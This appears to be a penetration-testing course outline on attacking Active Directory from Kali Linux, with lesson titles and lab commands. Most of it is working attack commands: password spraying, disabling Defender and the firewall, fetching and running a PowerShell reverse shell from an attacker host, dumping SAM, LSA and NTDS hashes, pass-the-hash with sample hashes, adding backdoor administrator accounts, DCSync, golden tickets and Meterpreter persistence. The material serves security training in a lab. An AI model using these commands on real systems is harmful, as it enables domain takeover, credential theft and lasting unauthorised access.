Active Directory Pentesting With Kali Linux Read Team Hacking

NMAP Preview 14:15

NMAP SMB Preview 20:16

More NMAP Enumeration Preview 11:23

winapsearch Preview 19:21

https://github.com/ropnop/windapsearch

LdapDomainDump Preview 15:24

Download it here:

https://github.com/dirkjanm/ldapdomaindump

Enumerating With Enum4Linux Preview 09:04

enum4linux -u ippsec -p Password12345 -a 192.168.1.50

NMAP - Users Preview 06:24

nmap -p 389 --script ldap-search --script-args 'ldap.username="cn=ippsec,cn=users,dc=pentesting,dc=local",ldap.password=Password12345,ldap.qfilter=users,ldap.attrib=sAMAccountName' 192.168.1.50 -Pn

nmap -p 88 --script=krb5-enum-users --script krb5-enum-users --script-args krb5-enum-users.realm='pentesting.local' 192.168.1.50 -Pn

GetADUsers.py Preview 08:31

wget https://raw.githubusercontent.com/SecureAuthCorp/impacket/master/examples/GetADUsers.py

python3 GetADUsers.py -all -dc-ip 192.168.1.50 pentesting.local/ippsec

wget https://raw.githubusercontent.com/SecureAuthCorp/impacket/master/examples/findDelegation.py

python3 findDelegation.py -dc-ip 192.168.1.50 pentesting.local/ippsec

python3 GetUserSPNs.py -dc-ip 192.168.1.50 pentesting.local/ippsec

CrackMapExec Intro Preview 08:53

https://github.com/byt3bl33d3r/CrackMapExec

CrackMapExec - Password Spraying Preview 12:37

Bruteforcing examples

crackmapexec smb 192.168.1.50-55 -u ippsec -p Password12345 --no-bruteforce

crackmapexec <protocol> <target(s)> -u username1 username2 -p password1

crackmapexec <protocol> <target(s)> -u ~/file_containing_usernames -p ~/file_containing_passwords

crackmapexec <protocol> <target(s)> -u ~/file_containing_usernames -H ~/file_containing_ntlm_hashes

CrackMapExec - ENUM 1.1 Preview 09:49

Enumerate shares and access

crackmapexec smb 192.168.1.50-55 -u ippsec -p Password12345 --shares

Enumerate active sessions

crackmapexec smb 192.168.1.50-55 -u ippsec -p Password12345  --sessions

Enumerate disks

crackmapexec smb 192.168.1.50-55 -u ippsec -p Password12345  --disks

Enumerate logged on users

crackmapexec smb 192.168.1.50-55 -u ippsec -p Password12345 --loggedon-users

Enumerate domain users

crackmapexec smb 192.168.1.50-55 -u ippsec -p Password12345 --users

CrackMapExec - ENUM 1.2 Preview 09:41

python3 crackmapexec.py smb 192.168.1.50 -u 'ippsec' -p 'Password12345' --users

Enumerate users by bruteforcing RID

cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --rid-brute

Enumerate domain groups

cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --groups

Enumerate local groups

cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --local-groups

Obtain domain password policy

cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --pass-pol

CrackMapExec - Command Execution Preview 13:35

crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'whoami'

crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'ipconfig'

crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'whoami /groups'

crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'Get-MpComputerStatus'

crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'Set-MpPreference -DisableRealtimeMonitoring $true'

crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'Get-MpComputerStatus'

crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'Set-MpPreference -DisableIOAVProtection $true'

crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'netsh advfirewall show allprofiles'

crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'netsh advfirewall set allprofiles state off'

crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'Invoke-WebRequest -Uri "http://192.168.1.223:8000/users.txt" -OutFile "c:\Users\ippsec\Desktop\user.txt"'

crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'dir c:\Users\ippsec\Desktop'

crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'type c:\Users\ippsec\Desktop\user.txt'

crackmapexec - Command execution + Using Local Auth Preview 12:11

crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345  -x 'net user /add admin Password12345'

crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345  -x 'net user'

#Add to Administrator Group

crackmapexec winrm 192.168.215.138 -u ippsec -p Password12345  -x 'net localgroup administrators admin /add'

crackmapexec winrm 192.168.215.138 -u ippsec -p Password12345  -x 'net localgroup administrators'

crackmapexec 192.168.215.138 -u admin -p Password12345  --local-auth

Get PowerShell Reverse Shell Preview 11:26

wget https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcpOneLine.ps1

mv Invoke-PowerShellTcpOneLine.ps1 invoke.ps1

nc -lvp 1234

crackmapexec wirm 192.168.1.54 -u ippsec -p Password12345 -X 'iex (New-Object Net.WebClient).DownloadString("http://192.168.1.223:8000/invoke.ps1")'

Dumping SAM Preview 05:36

SAM is short for the Security Account Manager which manages all the user accounts and their passwords. It acts as a database. All the passwords are hashed and then stored SAM. It is the responsibility of LSA (Local Security Authority) to verify user login by matching the passwords with the database maintained in SAM. SAM starts running in the background as soon as the Windows boots up. SAM is found in C:\Windows\System32\config and passwords that are hashed and saved in SAM can found in the registry, just open the Registry Editor and navigate yourself to HKEY_LOCAL_MACHINE\SAM.

crackmapexec smb 192.168.1.54 -u ippsec -p Password12345 --sam

ls ~/.cme/logs/

ls ~/.cme/logs/

Dumping LSA + PTH with CME Preview 16:43

sudo crackmapexec smb 192.168.1.54 -u ippsec -p Password12345 --lsa

#Where the dumps are stored

ls ~/.cme/logs/

cracking with John

john --format=NT hash

john --format=NT hash --show

john --format=NT  --wordlist=/home/user/Desktop/rockyou.txt hash

crackmapexec winrm 192.168.1.54 -u jenkinsadmin -H ffce0c45c18cfdbb3ec16289a9d704da -X 'whoami'

#against the domain controller, too

crackmapexec winrm 192.168.1.54 -u jenkinsadmin -H ffce0c45c18cfdbb3ec16289a9d704da -X 'whoami'

#Dump the entire NTLM --ntds database

sudo crackmapexec smb 192.168.1.50 -u jenkinsadmin -H ffce0c45c18cfdbb3ec16289a9d704da --ntds

pth-winexe and xfreerdp Preview 10:07

pth-winexe -U pentesting/

pth-winexe

apt-get update

apt-get install freerdp-x11

xfreerdp /u:ippsec /d:win2012 /pth: /v:192.168.1.54

CrackMapExec Modules Preview 13:40

crackmapexec smb -L

crackmapexec smb -M mimikatz --options

sudo crackmapexec smb 192.168.1.54 -M mimikatz -u ippsec -p Password12345

sudo crackmapexec smb 192.168.1.54 -M mimikatz -u ippsec -p Password12345 --server-port 81

saved here

ls /root/.cme/logs/

CrackMapExec CMEDB Preview 06:48

#start the database

cmedb

help

proto smb

help

creds

sudo crackmapexec smb 192.168.1.50 -id 2

sudo crackmapexec smb 192.168.1.50 -id 3

BloodHound Installation Preview 20:40

Install Java:

echo "deb http://httpredir.debian.org/debian stretch-backports main" | sudo tee -a /etc/apt/sources.list.d/stretch-backports.list

sudo apt-get update

Install Neo4j

1. Add the neo4j repo to your apt sources:

wget -O - https://debian.neo4j.com/neotechnology.gpg.key | sudo apt-key add -

echo 'deb https://debian.neo4j.com stable 4.0' > /etc/apt/sources.list.d/neo4j.list

sudo apt-get update

2. Install apt-transport-https with apt

apt-get install apt-transport-https

  3. Install neo4j community edition using apt:

sudo apt-get install neo4j

  4. Stop neo4j

systemctl stop neo4j

  5. Start neo4j

cd /usr/bin

./neo4j console or systemctl start neo4j

Open a web browser and navigate to https://localhost:7474/.

You should see the neo4j web console.

6. Authenticate to neo4j in the web console with username neo4j, password neo4j.

7. You’ll be prompted to change this password.

Download the BloodHound GUI

1. Download the latest version of the BloodHound GUI from

2. https://github.com/BloodHoundAD/BloodHound/releases

3. Unzip the folder, then run BloodHound with the –no-sandbox flag:

./BloodHound.bin --no-sandbox

https://bloodhound.readthedocs.io/en/latest/installation/linux.html

BADDD No AUDIO Getting Shells with CrackMapExec Preview 08:50

sudo msfconsole

use exploit/multi/handler

set LHOST 192.168.1.223 <-- local Machine

set LPORT 470

python3 -m http.server

crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'iex (New-Object Net.WebClient).DownloadString("http://192.168.1.223:8000/invoke.ps1")'

Basic commands Preview 06:15

AMSI

AntiMalware Scan Interface

Windows AMSI is integrated into the following components:

    PowerShell (scripts, interactive use, and dynamic code evaluation)

    PowerShell ISE (Windows PowerShell-IDE)

    Windows Script Host (Wscript.exe and Cscript.exe) (scripts and dynamic code evaluation)

    User Account Control (UAC) (using a different type of AMSI-provider)

    Office365 (JavaScript/VBA)

    Office365 (Documents)

    .Net Framework 4.8 (Scanning for all assemblies)

    Windows Management Instrumentation (WMI)

Upload and Download Preview 04:30

upload: local files can be auto-completed using tab key. It is not needed to put a remote_path if the local file is in the same directory as evil-winrm.rb file.

• usage: upload local_path remote_path

download: it is not needed to set local_path if the remote file is in the current directory.

• usage: download remote_path local_path

services: list all services. No administrator permissions needed.

PowerView.ps1 Preview 07:20

iex(new-object net.webclient).downloadstring(http://192.168.1.223:8000/PowerView.ps1')

Build SharpSploit - Enumeration Preview 06:11

Dll-Loader -http -path http://192.168.1.223:8000/SharpSploit.dll

menu

[SharpSploit.

[SharpSploit.Enumeration.Net]::GetNetLocalGroupMembers()

[SharpSploit.Enumeration.Net]::GetNetLocalGroups()

[SharpSploit.Enumeration.Net]::GetNetLoggedOnUsers()

[SharpSploit.Enumeration.Net]::GetNetSessions()

[SharpSploit.Enumeration.Net]::GetNetShares()

User, Group, and Network Preview 00:29

User Enumeration

Get current username

echo %USERNAME% || whoami

$env:username

List user privilege

whoami /priv

whoami /groups

List all users

net user

whoami /all

Get-LocalUser | ft Name,Enabled,LastLogon

Get-ChildItem C:\Users -Force | select Name

List logon requirements; useable for bruteforcing

net accounts

Get details about a user (i.e. administrator, admin, current user)

net user administrator

net user admin

net user %USERNAME%

List all local groups

net localgroup

Get-LocalGroup | ft Name

Get details about a group (i.e. administrators)

net localgroup administrators

Get-LocalGroupMember Administrators | ft Name, PrincipalSource

Get-LocalGroupMember Administrateurs | ft Name, PrincipalSource

Network Enumeration

List all network interfaces, IP, and DNS.

ipconfig /all

Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address

Get-DnsClientServerAddress -AddressFamily IPv4 | ft

List current routing table

route print

Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex

List the ARP table

arp -A

Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State

List all current connections

netstat -ano

List firewall state and current configuration

netsh advfirewall firewall dump

netsh firewall show state

netsh firewall show config

List firewall's blocked ports

$f=New-object -comObject HNetCfg.FwPolicy2;$f.rules | where {$_.action -eq "0"} | select name,applicationname,localports

Disable firewall

netsh firewall set opmode disable

netsh advfirewall set allprofiles state off

List all network shares

net share

SNMP Configuration

reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s

Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse

OS, AV, and Configuration Preview 00:54

Tools - Local Priv Esc Preview 01:03

https://mega.nz/folder/wFBUyZTa#KbU76tPKBymvg6HNObsTJg

Sherlock and Watson Preview 07:10

https://mega.nz/folder/wFBUyZTa#KbU76tPKBymvg6HNObsTJg

https://github.com/rasta-mouse/Sherlock

https://github.com/rasta-mouse/Watson

CVE-2019-1388 Preview 07:37

SEImpersonate Preview 10:19

Unquoted Service Path Preview 19:03

Windows - Privilege Escalation and Local Enumeartion Cheat Sheet Preview 00:00

Recommended Windows Hack The Box machines Preview 00:09

Basics and Installing Preview 11:41

https://github.com/BC-SECURITY/Empire

sudo apt install powershell-empire

sudo powershell-empire

Getting a Shell + CME + Powershell Preview 07:10

https://alpinesecurity.com/blog/empire-a-powershell-post-exploitation-tool/

Getting a shell + Evil-WinRM + Bat File Preview 11:22

Listeners

help

uselistener http

info <-  it will display all the options that you can tweak

BindIP to Kali’s IP address

Port to any port number other than 80

execute

https://www.youtube.com/watch?v=52xkWbDMUUM&ab_channel=HackerSploit

Privilege Escalation 1 - ReverShell With Unquoted Path Preview 25:33

Privilege Escalation 2 - Stager with NT/SYSTEM Preview 06:04

Privilege Escalation 3 Preview 11:06

net user raba Password123 /add

net localgroup administrators raba /add

net localgroup "Remote Management Users" raba /add

remove old

Elevated with Empire - Mimikatz and pth Preview 08:39

Pth + dcsync + dcshadow -1 Preview 15:02

Troubleshooting Empire Pth + dcsync + dcshadow - 2 Preview 15:10

Failed to get + dcsync + dcshadow - 3 Preview 04:39

Getting Shell with JenkinsAdmin Preview 06:38

evil-winrm -u jenkinsadmin -H ffce0c45c18cfdbb3ec16289a9d704da -i 192.168.1.50

upload /tmp/launcher.bat C:\Users\jenkinsadmin\Documents\launcher.bat

C:\Users\jenkinsadmin\Documents\launcher.bat

Finally Getting Dcsync + Persistent Preview 06:28

Intro Preview 12:45

Metasploit is a penetration testing framework that makes hacking simple. It's an essential tool for many attackers and defenders. Point Metasploit at your target, pick an exploit, what payload to drop, and hit Enter.

Exploiting Ethernal Blue Metasploit Preview 09:24

Check if it is exploitable:

use exploit/windows/smb/ms17_010_psexec

set rhosts 192.168.1.53

set smbpass Password123

set smbuser student1

set smbdomain pentesting.local

set paylod windows/meterpreter/reverse_tcp

run

/

Meterpreter is an advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime. It communicates over the stager socket and provides a comprehensive client-side Ruby API. It features command history, tab completion, channels, and more.

Enumeration 1 - User, Groups, Computers Preview 12:23

use Auxiliary/gather/Kerberos_enumusers

sysinfo

ps

post/windows/gather/enum_ad_users

post/windows/gather/enum_domain_group_users

post/windows/gather/enum_logged_on_users

post/windows/gather/enum_ad_user_comments

post/windows/gather/enum_domain_group_users

post/windows/gather/enum_domain

post/windows/gather/enum_computers

post/windows/gather/resolve_sid.rb

run post/windows/gather/enum_ad_computers.rb

post/windows/gather/local_admin_search_enum

post/windows/gather/enum_ad_service_principal_names

Enumeration 2 - Arp, Tokens, Patches Preview 11:22

run post/windows/gather/arp_scanner RHOSTS=192.168.1.0/24

ipconfig

netstat

route

#Windows Gather Enumerate Domain Admin Tokens (T

post/windows/gather/enum_tokens

post/windows/gather/enum_patches

post/windows/gather/credentials/winscp

#Windows Gather Powershell Environment Setting E

post/windows/gather/enum_powershell_env

post/windows/gather/enum_ie

post/windows/gather/bloodhound

for More

search post/windows/gather/

Enumeration 3 - Shares, SMB, and More Preview 09:47

use post/windows/gather/enum_shares

use post/windows/gather/enum_services

use post/windows/gather/enum_snmp

use post/windows/gather/enum_chrome

use post/windows/gather/enum_av_excluded

use post/windows/gather/enum_putty_saved_sessions

use post/windows/gather/enum_applications

use post/windows/gather/win_privs

use post/windows/gather/forensics/browser_history

for more:

search post/windows/gather/

Exploit Suggestor Preview 08:51

LOCAL_EXPLOIT_SUGGESTER

run post/multi/recon/local_exploit_suggester

post/windows/gather/win_privs

Exploit Suggestor 2 Preview 10:26

Back door add user Preview 07:19

post/windows/manage/add_user

set addtogroup true

set username test

set group administrators

set session 2

post/windows/manage/delete_user

HashDump With Metasploit Preview 06:28

search hashdump

search credential_collector

post/windows/gather/hashdump

post/windows/gather/credentials/credential_collector

meterpreter > load kiwi

meterpreter > help

Testing Credentials

crackmapexec smb 192.168.1.50 192.168.1.55 -u ippsec -p Password123!

Lateral Movement - PTH With metasploit Preview 14:40

https://www.offensive-security.com/metasploit-unleashed/psexec-pass-hash/

Pass The Hash with Psexec: Due to perform this jobs, only we need is NTLM hash of a privileged user. Thats exactly what we gained before with mimikatz.

• use exploit/windows/smb/psexec

  • set SMBDomain pentesting.local

  • set smbuser ippsec

  • set SMBPass e52cac67419a9a22c17ec4fe2a5374cb:2b576acbe6bcfda7294d6bd18041b8fe

  • set rhosts 192.168.1.55

  • set lport 4457

options

load kiwi

creds_msv

00000000000000000000000000000000

see if user is part of Domain Users

use post/windows/gather/enum_domain_group_users

Lateral Movement To DC - Metasploit Preview 11:42

Pass The Hash with Psexec: Due to perform this jobs, only we need is NTLM hash of a privileged user. Thats exactly what we gained before with mimikatz.

• use exploit/windows/smb/psexec

  • set SMBDomain pentesting.local

  • set smbuser s4vitar

  • set SMBPass 00000000000000000000000000000000:58a478135a93ac3bf058a5ea0e8fdb71

  • set rhosts 192.168.1.50

  • set lport 4457

options

load kiwi

creds_msv

00000000000000000000000000000000

see if user is part of Domain Users

use post/windows/gather/enum_domain_group_users

use post/windows/gather/credentials/domain_hashdump

scanner/smb/impacket/secretsdump

Steal_Token and Dumping All Hashes - Metasploit Preview 05:58

In metasploit framework there is an extension which is called incognito which allows us to perform activities such as token stealing and manipulation.These kind of activities are important in the privilege escalation stage of a penetration test because if we can steal the token of an administrator for example we can perform higher privilege operations on the target.

use post/windows/gather/credentials/domain_hashdump

use incognito

list_tokens -u

impersonate_token PENTESTING\\Administrator

DcSync With Metasploit Preview 04:55

From Domain Controller

meterpreter > use incognito

meterpreter > impersonate_token PENTESTING\\Administrator

meterpreter > load kiwi

meterpreter > help

meterpreter > kiwi_cmd '"lsadump::dcsync /user:Administrator"'

meterpreter > kiwi_cmd '"lsadump::dcsync /user:krbtgt"'

Golden Ticket With Metasploit Preview 07:17

use post/windows/escalate/golden_ticket

Golden Ticket attacks can be carried out against Active Directory domains, where access control is implemented using Kerberos tickets issued to authenticated users by a Key Distribution Service.

The attacker gains control over the domain’s Key Distribution Service account (KRBTGT account) by stealing its NTLM hash. This allows the attacker to generate Ticket Granting Tickets (TGTs) for any account in the Active Directory domain.

With valid TGTs, the attacker can request access to any resource/system on its domain from the Ticket Granting Service (TGS).

Because the attacker is controlling the component of the access control system that is responsible for issuing Ticket Granting Tickets (TGTs), then he has the golden ticket to access any resource on the domain.

kerberos_ticket_list

kerberos_ticket_use /root/.msf4/loot/20210501011013_default_192.168.1.50_golden.ticket_888290.bin

BACKDOOR METERPRETER SERVICE 1 Preview 05:30

After going through all the hard work of exploiting a system, it’s often a good idea to leave yourself an easier way back into the system for later use. This way, if the service you initially exploited is down or patched, you can still gain access to the system. Metasploit has a Meterpreter script, persistence.rb, that will create a Meterpreter service that will be available to you even if the remote system is rebooted.

meterpreter > run persistence -h

meterpreter > run persistence -U -i 5 -p 4458 -r 192.168.1.223

meterpreter > exit

use exploit/multi/handler

set PAYLOAD windows/x64/meterpreter/reverse_tcp

set LHOST 192.168.1.223

set LPORT 4458

exploit

When a user logs in to the remote system, a Meterpreter session is opened up for us.

BACKDOOR METERPRETER SERVICE 2 Preview 01:28

Intro Domain Enumeration Preview 00:39

https://mega.nz/folder/wFBUyZTa#KbU76tPKBymvg6HNObsTJg

Domain User Enumeration Preview 13:41

Domain Group Enumeration Preview 10:54

Domain Computer/Servers Enumeration Preview 07:10

PowerView - GPO and OU Preview 12:42

Domain Shares Enumeration Preview 10:39

PowerView - ACL Preview 20:55

Active Directory Recon Preview 08:58

BloodHound Installation Preview 16:31

BloodHound Basics Preview 17:38

Domain Enumeration Cheat Sheet - PowerView Preview 00:00

Intro to Lateral Movement - RDP Preview 01:01

https://mega.nz/folder/wFBUyZTa#KbU76tPKBymvg6HNObsTJg

How Kerberos Work Preview 00:00

Dumping SAM and SYSTEM For Offline Cracking Preview 11:55

SAM & LSA with MimiKatz Preview 08:26

PassTheHash with MimiKatz Preview 17:22

A Pass-the-Hash (PtH) attack is a technique whereby an attacker captures a password hash (as opposed to the password characters) and then simply passes it through for authentication and potentially lateral access to other networked systems. The threat actor doesn’t need to decrypt the hash to obtain a plain text password. PtH attacks exploit the authentication protocol, as the passwords hash remains static for every session until the password is rotated. Attackers commonly obtain hashes by scraping a system’s active memory and other techniques.

Passing the ticket Preview 15:16

In a pass-the-ticket attack, an attacker is able to extract a Kerberos Ticket Granting Ticket (TGT) from LSASS memory on a system and then use this on another system to request Kerberos service tickets (TGS) to gain access to network resources.

One primary difference between pass-the-hash and pass-the-ticket, is that Kerberos TGT tickets expire (10 hours by default) whereas NTLM hashes only change when the user changes their password. So a TGT ticket must be used within its lifetime, or it can be renewed for a longer period of time (7 days).   

Pass the ticket with Rubeus Preview 08:07

Session Hijack Preview 04:46

SMB Relay Attack Preview 08:10

10 ways to get dump files Preview 00:00

Intro - Domain Privilege Escalation Preview 00:53

https://mega.nz/folder/wFBUyZTa#KbU76tPKBymvg6HNObsTJg

ACL - GenericAll on Group Preview 11:45

Priv Esc – DNSAdmins Preview 22:20

dcsync Preview 19:19

Unconstrained delegation - Computer Preview 15:22

constrained Delegation - Computer Preview 14:52

ACL - GenericWrite on User Preview 12:18

SET-SPN - Kerberoast Preview 15:25

Targeted Kerberoasting - AS-REPs - FINDING Preview 11:30

Targeted Kerberoasting - AS-REPs - SET Preview 12:36

Intro Domain Persistence and Dominance - RDP Preview 00:57

https://mega.nz/folder/wFBUyZTa#KbU76tPKBymvg6HNObsTJg

DSRM Preview 12:24

DCShadow - Change Attribute Preview 07:16

DCShadow - SIDHistory Preview 08:41

DCShadow - hash Preview 15:00

Golden Ticket Preview 14:43

Silver Ticket Preview 11:29

AdminSDHolder - Adding Permission Preview 14:28

AdminSDHolder - Abusing Permission Preview 11:39

ZeroLogon -- Do This Last Preview 07:12